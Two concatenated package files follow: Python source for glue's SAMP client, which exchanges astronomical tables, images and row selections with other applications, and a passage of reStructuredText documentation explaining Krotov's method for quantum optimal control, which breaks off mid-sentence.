from glue.core.subset import ElementSubsetState
from glue.external.echo import delay_callback
__all__ = ['SAMPClient']

# Icon advertised to the SAMP hub; shipped alongside this module.
ICON_PATH = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'glue_samp_icon.png')

# MTypes this client subscribes to: table/image loading, row
# highlight/selection, and hub (un)registration notifications.
MTYPES = ['table.load.votable',
          'table.load.fits',
          'table.highlight.row',
          'table.select.rowList',
          'image.load.fits',
          'samp.hub.event.register',
          'samp.hub.event.unregister']
class SAMPClient(object):
    """Glue-side SAMP client.

    Connects glue to a SAMP hub (starting a private hub when none is
    running), exchanges tables, images and row selections with other SAMP
    applications, and keeps the ``state`` object's ``connected``/``status``/
    ``clients`` attributes in sync with the connection.
    """

    def __init__(self, state=None, session=None):
        self.state = state
        self.session = session
        self.data_collection = session.data_collection
        self.hub = SAMPHubServer()
        self.client = SAMPIntegratedClient()
        self.state.add_callback('connected', self.on_connected)

    def start_samp(self):
        """Connect to a SAMP hub, starting our own hub if none is available."""
        if not self.client.is_connected:
            try:
                self.client.connect()
            except SAMPHubError:
                # No hub running: start the bundled hub and retry once.
                try:
                    self.hub.start()
                    self.client.connect()
                except Exception:
                    with delay_callback(self.state, 'connected', 'status'):
                        self.state.connected = False
                        self.state.status = 'Could not connect to Hub'
                else:
                    with delay_callback(self.state, 'connected', 'status'):
                        self.state.connected = True
                        self.state.status = 'Connected to (glue) SAMP Hub'
            # BUG FIX: narrowed from a bare `except:` so SystemExit and
            # KeyboardInterrupt are not swallowed here.
            except Exception:
                with delay_callback(self.state, 'connected', 'status'):
                    self.state.connected = False
                    self.state.status = 'Could not connect to Hub'
            else:
                with delay_callback(self.state, 'connected', 'status'):
                    self.state.connected = True
                    self.state.status = 'Connected to SAMP Hub'
            self.update_clients()

    def stop_samp(self):
        """Disconnect from the hub and stop our own hub if we started it."""
        if self.client.is_connected:
            self.client.disconnect()
        if self.hub.is_running:
            self.hub.stop()
        self.state.connected = False
        self.state.status = 'Not connected to SAMP Hub'
        self.state.clients = []

    def register(self):
        """Subscribe to all supported MTypes (calls and notifications)."""
        for mtype in MTYPES:
            self.client.bind_receive_call(mtype, self.receive_call)
            self.client.bind_receive_notification(mtype, self.receive_notification)

    def unregister(self):
        """Unsubscribe from all MTypes, ignoring errors if already gone."""
        try:
            for mtype in MTYPES:
                self.client.unbind_receive_call(mtype)
                self.client.unbind_receive_notification(mtype)
        except (AttributeError, SAMPClientError):
            pass

    def on_connected(self, *args):
        """State callback: declare our metadata once connected."""
        if self.state.connected:
            metadata = {'author.email': '[email protected]',
                        'author.name': 'Thomas Robitaille',
                        'home.page': 'http://www.glueviz.org',
                        'samp.description.text': 'Multi-dimensional linked data exploration',
                        'samp.documentation.url': 'http://www.glueviz.org',
                        'samp.icon.url': 'file://' + ICON_PATH,
                        'samp.name': 'glueviz',
                        'glue.version': glue_version}
            self.client.declare_metadata(metadata)
            self.update_clients()

    def update_clients(self):
        """Refresh state.clients with (id, display name) of registered clients."""
        clients = []
        for client in self.client.get_registered_clients():
            metadata = self.client.get_metadata(client)
            clients.append((client, metadata.get('samp.name', client)))
        self.state.clients = clients

    def send_data(self, layer=None, client=None):
        """Broadcast a Data layer (as VOTable/FITS) or a subset (as a row list).

        If ``client`` is None, notify all clients; otherwise notify only that
        client, and only if it is subscribed to the message's MType.
        """
        # NOTE(review): tempfile.mktemp() is deprecated and race-prone;
        # mkstemp/NamedTemporaryFile would be safer but change the file's
        # lifetime semantics, so this is flagged rather than changed.
        filename = tempfile.mktemp()
        message = {}
        message["samp.params"] = {}
        if isinstance(layer, Data):
            if layer.ndim == 1:
                table = data_to_astropy_table(layer)
                table.write(filename, format='votable')
                message["samp.mtype"] = "table.load.votable"
                # Assign a persistent id so later selections can reference it.
                if 'samp-table-id' not in layer.meta:
                    layer.meta['samp-table-id'] = str(uuid.uuid4())
                message["samp.params"]['table-id'] = layer.meta['samp-table-id']
            elif layer.ndim == 2:
                fits_writer(filename, layer)
                message["samp.mtype"] = "image.load.fits"
                if 'samp-image-id' not in layer.meta:
                    layer.meta['samp-image-id'] = str(uuid.uuid4())
                message["samp.params"]['image-id'] = layer.meta['samp-image-id']
            else:
                # Only 1-d tables and 2-d images are supported.
                return
            message["samp.params"]['name'] = layer.label
            message["samp.params"]['url'] = 'file://' + os.path.abspath(filename)
        else:
            # Subset: send the selected row indices of the parent table.
            message['samp.mtype'] = 'table.select.rowList'
            if layer.ndim == 1:
                message["samp.params"]['table-id'] = layer.data.meta['samp-table-id']
                message["samp.params"]['row-list'] = np.nonzero(layer.to_mask())[0].astype(str).tolist()
            else:
                return
        if client is None:
            self.client.notify_all(message)
        else:
            # Make sure client is subscribed otherwise an exception is raised
            subscriptions = self.client.get_subscriptions(client)
            for mtype in subscriptions:
                if fnmatch(message['samp.mtype'], mtype):
                    self.client.notify(client, message)
                    return
            else:
                return

    def receive_call(self, private_key, sender_id, msg_id, mtype, params, extra):
        """Handle a SAMP call: process the message, then acknowledge it."""
        self.receive_message(private_key, sender_id, msg_id, mtype, params, extra)
        self.client.reply(msg_id, {"samp.status": "samp.ok", "samp.result": {}})

    def receive_notification(self, private_key, sender_id, msg_id, mtype, params, extra):
        """Handle a SAMP notification (no reply expected)."""
        self.receive_message(private_key, sender_id, msg_id, mtype, params, extra)

    def receive_message(self, private_key, sender_id, msg_id, mtype, params, extra):
        """Dispatch an incoming SAMP message by its MType."""
        logger.info('SAMP: received message - sender_id={0} msg_id={1} mtype={2} '
                    'params={3} extra={4}'.format(sender_id, msg_id, mtype,
                                                  params, extra))
        if mtype.startswith('table.load'):
            if self.table_id_exists(params['table-id']):
                logger.info('SAMP: table with table-id={0} has already '
                            'been read in'.format(params['table-id']))
                return
            logger.info('SAMP: loading table with table-id={0}'.format(params['table-id']))
            if mtype == 'table.load.votable':
                data = astropy_tabular_data_votable(params['url'])
            elif mtype == 'table.load.fits':
                data = astropy_tabular_data_fits(params['url'])
            else:
                logger.info('SAMP: unknown format {0}'.format(mtype.split('.')[-1]))
                return
            if 'name' in params:
                data.label = params['name']
            if 'table-id' in params:
                data.meta['samp-table-id'] = params['table-id']
            self.data_collection.append(data)
        elif mtype.startswith('image.load'):
            if self.image_id_exists(params['image-id']):
                logger.info('SAMP: image with image-id={0} has already '
                            'been read in'.format(params['image-id']))
                return
            logger.info('SAMP: loading image with image-id={0}'.format(params['image-id']))
            if mtype == 'image.load.fits':
                data = fits_reader(params['url'])[0]
            else:
                logger.info('SAMP: unknown format {0}'.format(mtype.split('.')[-1]))
                return
            if 'name' in params:
                data.label = params['name']
            if 'image-id' in params:
                data.meta['samp-image-id'] = params['image-id']
            self.data_collection.append(data)
        elif self.state.highlight_is_selection and mtype == 'table.highlight.row':
            if not self.table_id_exists(params['table-id']):
                return
            data = self.data_from_table_id(params['table-id'])
            subset_state = ElementSubsetState(indices=[params['row']], data=data)
            self.session.edit_subset_mode.update(self.data_collection, subset_state)
        elif mtype == 'table.select.rowList':
            if not self.table_id_exists(params['table-id']):
                return
            data = self.data_from_table_id(params['table-id'])
            rows = np.asarray(params['row-list'], dtype=int)
            subset_state = ElementSubsetState(indices=rows, data=data)
            self.session.edit_subset_mode.update(self.data_collection, subset_state)
        elif mtype == 'samp.hub.event.register' or mtype == 'samp.hub.event.unregister':
            self.update_clients()

    def table_id_exists(self, table_id):
        """Return True if a dataset with this SAMP table-id is already loaded."""
        for data in self.data_collection:
            if data.meta.get('samp-table-id', None) == table_id:
                return True
        else:
            return False

    def data_from_table_id(self, table_id):
        """Return the dataset with this SAMP table-id, or raise if absent."""
        for data in self.data_collection:
            if data.meta.get('samp-table-id', None) == table_id:
                return data
        else:
            raise Exception("Table {0} not found".format(table_id))

    def image_id_exists(self, image_id):
        """Return True if a dataset with this SAMP image-id is already loaded."""
        for data in self.data_collection:
            if data.meta.get('samp-image-id', None) == image_id:
                return True
        else:
            return False

    def data_from_image_id(self, image_id):
        """Return the dataset with this SAMP image-id, or raise if absent."""
        for data in self.data_collection:
            if data.meta.get('samp-image-id', None) == image_id:
                return data
        else:
            raise Exception("image {0} not found".format(image_id))
|
PypiClean
|
/krotov-1.2.1.tar.gz/krotov-1.2.1/docs/07_krotovs_method.rst
|
.. _KrotovsMethod:
Krotov’s Method
===============
The quantum control problem
---------------------------
Quantum optimal control methods formalize the problem of finding
"control fields" that steer the time evolution of a quantum system in
some desired way. For closed systems, described by a Hilbert space state
:math:`\ket{\Psi(t)}`, this time evolution is given by the Schrödinger
equation,
.. math::
\frac{\partial}{\partial t} \Ket{\Psi(t)}
= -\frac{\mathrm{i}}{\hbar} \Op{H}(t)\Ket{\Psi(t)}\,,
where the Hamiltonian :math:`\Op{H}(t)` depends on one or more control
fields :math:`\{\epsilon_l(t)\}`. We often assume the Hamiltonian to be
linear in the controls,
.. math::
\Op{H}(t)
= \Op{H}_0 + \epsilon_1(t) \Op{H}_1 + \epsilon_2(t) \Op{H}_2 + \dots
but non-linear couplings may also occur, for example when considering
non-resonant multi-photon transitions. For open quantum systems
described by a density matrix :math:`\hat{\rho}(t)`, the
Liouville-von-Neumann equation
.. math::
\frac{\partial}{\partial t} \hat{\rho}(t)
= \frac{1}{\hbar} \Liouville(t) \hat{\rho}(t)
replaces the Schrödinger equation, with the (non-Hermitian) Liouvillian
:math:`\Liouville(t)`.
The most direct example of a control problem is a state-to-state transition.
The objective is for a known quantum state :math:`\ket{\phi}` at time
zero to evolve to a specific target state :math:`\ket{\phi^\tgt}` at
final time :math:`T`, controlling, e.g. a chemical
reaction :cite:`TannorJCP1985`.
Another example is the
realization of quantum gates, the building blocks of a quantum computer.
In this case, the states forming a computational basis must transform
according to a unitary transformation :cite:`NielsenChuang`,
see :ref:`HowtoGateOptimization`. Thus, the
control problem involves not just the time evolution of a single state,
but a set of states :math:`\{\ket{\phi_k(t)}\}`. Generalizing even
further, each state :math:`\ket{\phi_k(t)}` in the control problem may
evolve under a different Hamiltonian
:math:`\Op{H}_k(\{\epsilon_l(t)\})`, see :ref:`HowtoRobustOptimization`.
Physically, the control fields :math:`\{\epsilon_l(t)\}` might be the
amplitudes of a laser pulse for the control of molecular systems or
trapped atom/ion quantum computers, radio-frequency fields for nuclear
magnetic resonance, or microwave fields for superconducting circuits.
When there are multiple independent controls :math:`\{\epsilon_l(t)\}`
involved in the dynamics, these may correspond e.g., to different color
lasers used in the excitation of a Rydberg atom, or different
polarization components of an electric field.
The quantum control methods build on a rich field of classical control
theory :cite:`BellmanBook,PontryaginBook`. This includes
Krotov's method :cite:`KrotovEC1983,KrotovCC1988,Krotov.book,KonnovARC99`,
which was originally formulated to optimize the soft landing of a
spacecraft from orbit to the surface of a planet, before being applied
to quantum mechanical
problems :cite:`Tannor92,SomloiCP1993,BartanaJCP1997,SklarzPRA2002,ReichJCP12`.
Fundamentally, they rely on the variational principle, that is, the
minimization of a functional
:math:`J[\{\ket{\phi_k^{(i)}(t)}\}, \{\epsilon_l^{(i)}(t)\}]` that
includes any required constraints via Lagrange multipliers. The
condition for minimizing :math:`J` is then
:math:`\nabla_{\phi_k, \epsilon_l} J = 0`. In rare cases, the
variational calculus can be solved in closed form, based on Pontryagin's
maximum principle :cite:`PontryaginBook`. Numerical methods
are required in any other case. These start from an initial guess
control (or set of guess controls, if there are multiple controls), and
calculate an update to these controls that will decrease the value of
the functional. The updated controls then become the guess for the next
iteration of the algorithm, until the value of the functional is
sufficiently small, or convergence is reached.
Optimization functional
-----------------------
Mathematically, Krotov's method, when applied to quantum
systems :cite:`Tannor92,ReichJCP12`, minimizes a functional
of the most general form
.. math::
:label: functional
J[\{\ket{\phi_k^{(i)}(t)}\}, \{\epsilon_l^{(i)}(t)\}]
= J_T(\{\ket{\phi_k^{(i)}(T)}\})
+ \sum_l \int_0^T g_a(\epsilon_l^{(i)}(t)) \dd t
+ \int_0^T g_b(\{\phi^{(i)}_k(t)\}) \dd t\,,
where the :math:`\{\ket{\phi_k^{(i)}(T)}\}` are the time-evolved
initial states :math:`\{\ket{\phi_k}\}` under the controls
:math:`\{\epsilon^{(i)}_l(t)\}` of the :math:`i`\ 'th iteration. In the
simplest case of a single state-to-state transition, the index :math:`k`
vanishes. For the example of a two-qubit quantum gate,
:math:`\{\ket{\phi_k}\}` would be the logical basis states
:math:`\ket{00}`, :math:`\ket{01}`, :math:`\ket{10}`, and
:math:`\ket{11}`, all evolving under the same Hamiltonian
:math:`\Op{H}_k \equiv \Op{H}`. The sum over :math:`l` vanishes if there
is only a single control. For open system dynamics, the states
:math:`\{\ket{\phi_k}\}` may be density matrices.
The functional consists of three parts:
- A final time functional :math:`J_T`. This is the "main" part of the
functional, and we can usually think of :math:`J` as being an
auxiliary functional in the optimization of :math:`J_T`.
- A running cost on the control fields, :math:`g_a`. The most commonly
used expression (and the only one currently supported by the
:mod:`krotov` package) is :cite:`PalaoPRA2003`
.. math::
:label: g_a
\begin{split}
g_a(\epsilon_l^{(i)}(t))
&= \frac{\lambda_{a,l}}{S_l(t)} \left(
\epsilon_l^{(i)}(t) - \epsilon_{l, \text{ref}}^{(i)}(t)
\right)^2\,;
\quad
\epsilon^{(i)}_{l, \text{ref}}(t) = \epsilon_l^{(i-1)}(t)\\
&= \frac{\lambda_{a,l}}{S_l(t)} \left( \Delta\epsilon_l^{(i)}(t) \right)^2
\,,
\end{split}
with the inverse "step width" :math:`\lambda_{a,l} > 0`, the "update
shape" function :math:`S_{l}(t) \in [0, 1]`, and the :ref:`IterativeControlUpdate`
.. math::
:label: update
\Delta\epsilon_l^{(i)}(t)
\equiv \epsilon_l^{(i)}(t) - \epsilon_l^{(i-1)}(t)\,,
where :math:`\epsilon_l^{(i-1)}(t)` is the optimized control of the
previous iteration – that is, the guess control of the current
iteration :math:`(i)`.
- An optional state-dependent running cost, :math:`g_b`. This may be
used to encode time-dependent control
targets :cite:`KaiserJCP2004,SerbanPRA2005`, or to penalize population in a
subspace :cite:`PalaoPRA2008`. The presence of a
state-dependent constraint in the functional entails an inhomogeneous
term in the backward propagation in the calculation of the control
updates in each iteration of Krotov's method, see Eq. :eq:`bw_eqm`, and is
currently not supported by the :mod:`krotov` package. Penalizing
population in a subspace can also be achieved through simpler methods
that do not require a :math:`g_b`, e.g., by using a non-Hermitian
Hamiltonian to remove population from the forbidden subspace during
the time evolution.
The most commonly used final-time functionals (cf. :mod:`krotov.functionals`)
optimize for a set of initial states :math:`\{\ket{\phi_k}\}` to evolve to a
set of target states :math:`\{\ket{\phi_k^\tgt}\}`. The functionals can then
be expressed in terms of the complex overlaps of the target states with the
final-time states under the given control. Thus,
.. math::
:label: tauk
\tau_k = \Braket{\phi_k^\tgt}{\phi_k(T)}
in Hilbert space, or
.. math::
\tau_k
= \langle\!\langle \Op{\rho}^{\tgt} \vert \Op{\rho}_k(T) \rangle\!\rangle
\equiv \tr\left[\Op{\rho}_k^{\tgt\,\dagger} \Op{\rho}_k(T) \right]
in Liouville space.
The following functionals :math:`J_T` can be formed from these complex
overlaps, taking into account that any optimization functional :math:`J_T` must
be real. They differ by the way they treat the phases :math:`\varphi_k` in the
physical optimization goal :math:`\ket{\phi_k(T)} \overset{!}{=}
e^{i\varphi_k}\ket{\phi_k^{\tgt}}` :cite:`PalaoPRA2003`:
* Optimize for simultaneous state-to-state transitions, with completely
arbitrary phases :math:`\varphi_k`,
.. math::
:label: JTss
J_{T,\text{ss}} = 1- \frac{1}{N} \sum_{k=1}^{N} \Abs{\tau_k}^2\,,
cf. :func:`.J_T_ss`.
* Optimize for simultaneous state-to-state transitions, with an arbitrary
*global* phase, i.e., :math:`\varphi_k = \varphi_{\text{global}}` for all
:math:`k` with arbitrary :math:`\varphi_{\text{global}}`,
.. math::
:label: JTsm
J_{T,\text{sm}} = 1- \frac{1}{N^2} \Abs{\sum_{k=1}^{N} \tau_k}^2
= 1- \frac{1}{N^2} \sum_{k=1}^{N} \sum_{k'=1}^{N} \tau_{k'}^* \tau_{k}\,,
cf. :func:`.J_T_sm`.
* Optimize for simultaneous state-to-state transitions, with a global phase of zero, i.e.,
:math:`\varphi_k = 0` for all :math:`k`,
.. math::
:label: JTre
J_{T,\text{re}} = 1-\frac{1}{N} \Re \left[\, \sum_{k=1}^{N} \tau_k \,\right]\,,
cf. :func:`.J_T_re`.
.. _IterativeControlUpdate:
Iterative control update
------------------------
Starting from the initial guess control :math:`\epsilon_l^{(0)}(t)`, the
optimized field :math:`\epsilon_l^{(i)}(t)` in iteration :math:`i > 0`
is the result of applying a control update,
.. math::
:label: eps_update
\epsilon_l^{(i)}(t)
= \epsilon_l^{(i-1)}(t) + \Delta\epsilon_l^{(i)}(t)\,.
Krotov's method is a clever construction of a particular
:math:`\Delta\epsilon_l^{(i)}(t)` that ensures
.. math::
J[\{\ket{\phi_k^{(i)}(t)}\}, \{\epsilon_l^{(i)}(t)\}] \leq
J[\{\ket{\phi_k^{(i-1)}(t)}\}, \{\epsilon_l^{(i-1)}(t)\}]\,.
Krotov's solution for :math:`\Delta\epsilon_l^{(i)}(t)` is given in
below (:ref:`FirstOrderUpdate` and :ref:`SecondOrderUpdate`).
As shown there,
for the specific running cost of Eq. :eq:`g_a`, using the
guess control field :math:`\epsilon_l^{(i-1)}(t)` as the "reference"
field, the update :math:`\Delta\epsilon^{(i)}_l(t)` is proportional to
:math:`\frac{S_l(t)}{\lambda_{a,l}}`. Note that this also makes
:math:`g_a` proportional to :math:`\frac{S_l(t)}{\lambda_{a,l}}`, so
that Eq. :eq:`g_a` is still well-defined for
:math:`S_l(t) = 0`. The (inverse) Krotov step width
:math:`\lambda_{a,l}` can be used to determine the overall magnitude of
:math:`\Delta\epsilon^{(i)}_l(t)`. Values that are too large will change
:math:`\epsilon_l^{(i)}(t)` by only a small amount in every iteration,
causing slow convergence. Values that are too small will result in numerical
instability, see :ref:`TimeDiscretization` and :ref:`ChoiceOfLambdaA`. The
"update shape" function :math:`S_l(t)` allows to ensure boundary conditions on
:math:`\epsilon^{(i)}_l(t)`: If both the guess field
:math:`\epsilon^{(i-1)}_l(t)` and :math:`S_l(t)` switch on and off smoothly
around :math:`t=0` and :math:`t=T`, then this feature will be preserved by the
optimization. A typical example for an update shape is
.. math::
:label: flattop
S_l(t) = \begin{cases}
B(t; t_0=0, t_1=2 t_{\text{on}})
& \text{for} \quad 0 < t < t_{\text{on}} \\
1 & \text{for} \quad t_{\text{on}} \le t \le T - t_{\text{off}} \\
B(t; t_0=T-2 t_{\text{off}}, t_1=T)
& \text{for} \quad T - t_{\text{off}} < t < T\,,
\end{cases}
cf. :func:`krotov.shapes.flattop`, with the `Blackman shape`_
.. math::
:label: blackman
B(t; t_0, t_1) =
\frac{1}{2}\left(
1 - a - \cos\left(2\pi \frac{t - t_0}{t_1 - t_0}\right)
+ a \cos\left(4\pi \frac{t - t_0}{t_1 - t_0}\right)
\right)\,,\quad a = 0.16\,,
which is similar to a Gaussian, but exactly zero at
:math:`t = t_0, t_1`. This is essential to maintain the typical boundary
condition of zero amplitude at the beginning and end of the optimized
control field. Generally, *any* part of the control field can be kept
unchanged in the optimization by choosing :math:`S_l(t) = 0` for the
corresponding intervals of the time grid.
.. _Blackman shape: https://en.wikipedia.org/wiki/Window_function#Blackman_window
.. Note::
In the remainder of this chapter, we review some of the mathematical details
of how Krotov's method calculates the update in Eqs. :eq:`update`, :eq:`eps_update`.
These details are not necessary to *use* the :mod:`krotov` package as a
"black box" optimization tool, so you may skip ahead to
:ref:`using-krotov-with-qutip` and come back at a later time.
.. _FirstOrderUpdate:
First order update
------------------
Krotov's method is based on a rigorous examination of the conditions for
calculating the updated fields :math:`\{\epsilon_l^{(i)}(t)\}` such that
:math:`J(\{\ket{\phi_k^{(i)}(t)}\}, \{\epsilon_l^{(i)}(t)\}) \leq
J(\{\ket{\phi_k^{(i-1)}(t)}\}, \{\epsilon_l^{(i-1)}(t)\})` is true *by
construction* :cite:`Krotov.book,KonnovARC99,PalaoPRA2003,SklarzPRA2002,ReichJCP12`.
For a general functional of the form in
Eq. :eq:`functional`, with a convex final-time
functional :math:`J_T`, the condition for monotonic convergence is
.. math::
:label: krotov_first_order_proto_update
\frac{\partial g_a}{\partial \epsilon_l(t)}\bigg\vert_{(i)}
= 2 \Im \left[\,
\sum_{k=1}^{N} \Bigg\langle \chi_k^{(i-1)}(t) \Bigg\vert \Bigg(
\frac{\partial \Op{H}}{\partial \epsilon_l(t)}\bigg\vert_{
(i)} \Bigg)
\Bigg\vert \phi_k^{(i)}(t) \Bigg\rangle
\right]\,,
see Ref. :cite:`PalaoPRA2003`.
The notation for the derivative on the right hand side being evaluated
at :math:`{(i)}` should be understood to apply when the control
Hamiltonian is not linear so that
:math:`\frac{\partial \Op{H}}{\partial \epsilon_l(t)}` is still
time-dependent; the derivative must then be evaluated for
:math:`\epsilon^{(i)}_l(t)` – or, numerically, for
:math:`\epsilon^{(i-1)}_l(t) \approx \epsilon^{(i)}_l(t)`. If there are
multiple controls, Eq. :eq:`krotov_first_order_proto_update`
holds for every control field :math:`\epsilon_l(t)` independently.
For :math:`g_a` as in Eq. :eq:`g_a`, this results in an
*update*
equation :cite:`Tannor92,PalaoPRA2003,SklarzPRA2002`,
.. math::
:label: krotov_first_order_update
\Delta\epsilon^{(i)}_l(t)
= \frac{S_l(t)}{\lambda_{a,l}} \Im \left[\,
\sum_{k=1}^{N} \Bigg\langle \chi_k^{(i-1)}(t) \Bigg\vert \Bigg(
\frac{\partial \Op{H}}{\partial \epsilon_l(t)}
\bigg\vert_{(i)} \Bigg)
\Bigg\vert \phi_k^{(i)}(t) \Bigg\rangle
\right]\,,
with the equation of motion for the forward propagation of
:math:`\ket{\phi_k^{(i)}}` under the optimized controls
:math:`\{\epsilon_l^{(i)}(t)\}` of the iteration :math:`(i)`,
.. math::
:label: fw_eqm
\frac{\partial}{\partial t} \Ket{\phi_k^{(i)}(t)}
= -\frac{\mathrm{i}}{\hbar} \Op{H}^{(i)} \Ket{\phi_k^{(i)}(t)}\,.
The co-states :math:`\ket{\chi_k^{(i-1)}(t)}` are propagated backwards
in time under the guess controls of iteration :math:`(i)`, i.e., the
optimized controls from the previous iteration :math:`(i-1)`, as
.. math::
:label: bw_eqm
\frac{\partial}{\partial t} \Ket{\chi_k^{(i-1)}(t)}
= -\frac{\mathrm{i}}{\hbar} \Op{H}^{\dagger\,(i-1)} \Ket{\chi_k^{(i-1)}(t)}
+ \left.\frac{\partial g_b}{\partial \Bra{\phi_k}}\right\vert_{(i-1)}\,,
with the boundary condition
.. math::
:label: chi_boundary
\Ket{\chi_k^{(i-1)}(T)}
= - \left.\frac{\partial J_T}{\partial \Bra{\phi_k(T)}}
\right\vert_{(i-1)}\,,
where the right-hand-side is evaluated for the set of states
:math:`\{\ket{\phi_k^{(i-1)}(T)}\}` resulting from the forward-propagation of
the initial states under the guess controls of iteration :math:`(i)` – that is,
the optimized controls of the previous iteration :math:`(i-1)`.
For example, for the functional :math:`J_{T,\text{ss}}` in Eq. :eq:`JTss` for
a single state-to-state transition (:math:`N=1`),
.. math::
\begin{split}
\ket{\chi^{(i-1)}(T)}
&= \frac{\partial}{\partial \Bra{\phi(T)}}
\underbrace{%
\Braket{\phi(T)}{\phi^\tgt}
\Braket{\phi^\tgt}{\phi(T)}
}_{\Abs{\Braket{\phi^\tgt}{\phi(T)}}^2}
\Bigg\vert_{(i-1)} \\
&= \left(\Braket{\phi^\tgt}{\phi^{(i-1)}(T)}\right) \Ket{\phi^\tgt}\,,
\end{split}
cf. :func:`krotov.functionals.chis_ss` and the :mod:`krotov.functionals` module
in general.
.. _SecondOrderUpdate:
Second order update
-------------------
The update
Eq. :eq:`krotov_first_order_update`
assumes that the equation of motion is linear (:math:`\Op{H}` does not
depend on the states :math:`\ket{\phi_k(t)}`), the functional
:math:`J_T` is convex, and no state-dependent constraints are used
(:math:`g_b\equiv 0`). When any of these conditions are not fulfilled,
it is still possible to derive an optimization algorithm with monotonic
convergence via a "second order" term in
Eqs. :eq:`krotov_first_order_proto_update`, :eq:`krotov_first_order_update` :cite:`KonnovARC99,ReichJCP12`.
The full update equation then reads
.. math::
:label: krotov_second_order_update
\begin{split}
\Delta\epsilon^{(i)}_l(t)
&= \frac{S_l(t)}{\lambda_{a,l}} \Im \left[\,
\sum_{k=1}^{N} \Bigg\langle \chi_k^{(i-1)}(t) \Bigg\vert \Bigg(
\frac{\partial \Op{H}}{\partial \epsilon_l(t)}
\bigg\vert_{(i)} \Bigg)
\Bigg\vert \phi_k^{(i)}(t) \Bigg\rangle
\right. \\ & \qquad \qquad \quad \left.
+ \frac{1}{2} \sigma(t)
\Bigg\langle \Delta\phi_k^{(i)}(t) \Bigg\vert \Bigg(
\frac{\partial \Op{H}}{\partial \epsilon_l(t)}
\bigg\vert_{(i)} \Bigg)
\Bigg\vert \phi_k^{(i)}(t) \Bigg\rangle
\right]\,,
\end{split}
with
.. math::
\ket{\Delta \phi_k^{(i)}(t)}
\equiv \ket{\phi_k^{(i)}(t)} - \ket{\phi_k^{(i-1)}(t)}\,,
see Ref. :cite:`ReichJCP12` for the full construction of
the second-order condition.
In Eq. :eq:`krotov_second_order_update`,
:math:`\sigma(t)` is a scalar function that must be properly chosen to
ensure monotonic convergence.
In Refs. :cite:`WattsPRA2015,GoerzPRA2015`, a non-convex
final-time functional for the optimization towards an arbitrary perfect
entangler is considered. For this specific example, a suitable choice is
.. math:: \sigma(t) \equiv -\max\left(\varepsilon_A,2A+\varepsilon_A\right)\,,
where :math:`\varepsilon_A` is a small non-negative number. The optimal
value for :math:`A` in each iteration can be approximated numerically
as :cite:`ReichJCP12`
.. math::
\label{eq:numericalA}
A = \frac{
\sum_{k=1}^{N} 2 \Re\left[
\langle \chi_k(T) \vert \Delta\phi_k(T) \rangle \right] + \Delta J_T}{
\sum_{k=1}^{N} \Abs{\Delta\phi_k(T)}^2} \,,
cf. :func:`krotov.second_order.numerical_estimate_A`, with
.. math:: \Delta J_T \equiv J_T(\{\phi_k^{(i)}(T)\}) -J_T(\{\phi_k^{(i-1)}(T)\})\,.
See the :ref:`/notebooks/07_example_PE.ipynb` for an example.
.. Note::
Even when the second order update equation is mathematically required to
guarantee monotonic convergence, very often an optimization with the
first-order update equation :eq:`krotov_first_order_update` will give
converging results. Since the second order update requires
more numerical resources (calculation and storage of the states
:math:`\ket{\Delta\phi_k(t)}`), you should always try the optimization with
the first-order update equation first.
.. _TimeDiscretization:
Time discretization
-------------------
.. _figkrotovscheme:
.. figure:: krotovscheme.svg
:alt: Sequential update scheme in Krotov’s method on a time grid.
:width: 100%
Sequential update scheme in Krotov’s method on a time grid.
The derivation of Krotov's method assumes time-continuous control
fields. Only in this case, monotonic convergence is mathematically
guaranteed. However, for practical numerical applications, we have to
consider controls on a discrete time grid with :math:`N_T+1` points running
from :math:`t=t_0=0` to :math:`t=t_{N_T}=T`, with a time step :math:`\dd t`. The
states are defined on the points of the time grid, while the controls
are assumed to be constant on the intervals of the time grid.
See the notebook `Time Discretization in Quantum Optimal Control`_
for details.
The discretization yields the numerical scheme shown in
:numref:`figkrotovscheme` for a single control
field (no index :math:`l`), and assuming the first-order update is
sufficient to guarantee monotonic convergence for the chosen functional.
For simplicity, we also assume that the Hamiltonian is linear in the
control, so that :math:`\partial \Op{H} / \partial \epsilon(t)` is not
time-dependent. The scheme proceeds as follows:
#. Construct the states :math:`\{\ket{\chi^{(i-1)}_k(T)}\}` according to
Eq. :eq:`chi_boundary`. For most functionals,
specifically any that are more than linear in the overlaps
:math:`\tau_k` defined in Eq. :eq:`tauk`, the states
:math:`\{\ket{\chi^{(i-1)}_k(T)}\}` depend on the states
:math:`\{\ket{\phi^{(i-1)}_k(T)}\}` forward-propagated under the
optimized pulse from the previous iteration, that is, the guess pulse
in the current iteration.
#. Perform a backward propagation using
Eq. :eq:`bw_eqm` as the equation of motion over the
entire time grid. The resulting state at each point in the time grid
must be stored in memory.
#. Starting from the known initial states
:math:`\{\ket{\phi_k}\} = \{\ket{\phi_k(t=t_0=0)}\}`, calculate the pulse
update for the first time step according to
.. math::
:label: update_discretized0
\Delta\epsilon^{(i)}_1
\equiv \Delta\epsilon^{(i)}(\tilde{t}_0)
= \frac{S(\tilde{t}_0)}{\lambda_{a}} \Im \left[\,
\sum_{k=1}^{N} \bigg\langle \chi_k^{(i-1)}(t_0) \bigg\vert
\frac{\partial \Op{H}}{\partial \epsilon}
\bigg\vert \phi_k(t_0) \bigg\rangle
\right]\,.
The value :math:`\Delta\epsilon^{(i)}_1` is taken on the midpoint of
the first time interval, :math:`\tilde{t}_0 \equiv t_0 + \dd t/2`,
based on the assumption of a piecewise-constant control field and an
equidistant time grid with spacing :math:`\dd t`.
#. Use the updated field :math:`\epsilon^{(i)}_1` for the first interval
to propagate :math:`\ket{\phi_k(t=t_0)}` for a single time step to
:math:`\ket{\phi_k^{(i)}(t=t_0 + \dd t)}`, with
Eq. :eq:`fw_eqm` as the equation of motion. The
updates then proceed sequentially, using the discretized update
equation
.. math::
:label: update_discretized
\Delta\epsilon^{(i)}_{n+1}
\equiv \Delta\epsilon^{(i)}(\tilde{t}_n)
= \frac{S(\tilde{t}_n)}{\lambda_{a}} \Im \left[\,
\sum_{k=1}^{N} \bigg\langle \chi_k^{(i-1)}(t_n) \bigg\vert
\frac{\partial \Op{H}}{\partial \epsilon}
\bigg\vert \phi_k^{(i)}(t_n) \bigg\rangle
\right]
with :math:`\tilde{t}_n \equiv t_n + \dd t / 2` for each time
interval :math:`n`, until the final forward-propagated state
:math:`\ket{\phi^{(i)}_k(T)}` is reached.
#. The updated control field becomes the guess control for the next
iteration of the algorithm, starting again at step 1. The
optimization continues until the value of the functional :math:`J_T`
falls below some predefined threshold, or convergence is reached,
i.e., :math:`\Delta J_T` approaches zero so that no further significant
